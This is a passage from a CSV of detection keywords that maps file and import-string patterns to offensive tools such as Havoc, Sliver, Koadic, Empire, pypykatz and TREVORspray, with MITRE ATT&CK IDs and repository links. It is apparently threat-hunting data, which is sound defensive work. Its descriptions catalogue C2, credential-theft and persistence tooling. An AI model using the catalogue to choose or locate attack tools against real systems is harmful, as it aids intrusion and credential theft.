T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*impersonateuser.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*impersonateuser.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*imperva_gzip.py*","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","146","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" +"*Implant*TeamServer.exe*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" +"*Implant.ImplantGenerator*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*implant.sleep-obf*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*implant/elevate/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*implant/gather/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*implant/inject/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*implant/persist/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*implant/pivot/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*implant/sliver/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*Implant\SleepMask*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*implant-callback.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*ImplantSSP.csproj*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*import _eternalhush*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*import apypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*import BaseSprayModule*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*import DCSYNC*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*import DNSListener*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*import EnablePersistence*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*import eternalhush.*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*import IBurpExtender*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*import impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*import ImpactDecoder*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*import ImpactPacket*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*import LdapSearchBofParser*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*import metame","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" +"*import mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*import np_server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*import Payload*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*import pe.OBJExecutable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*Import powerview*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*import PupyConfig*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*import PyInstaller*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*import pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*import ShadowForgeHome*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*import SimpleHTTPServer*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*import Stager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*import udmp_parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*import wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*import wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*import/nessus/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*import/nexpose*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*import_msf_web*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ImportDll::GetAsyncKeyState*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllImports -PEInfo *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Import-DllImports*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 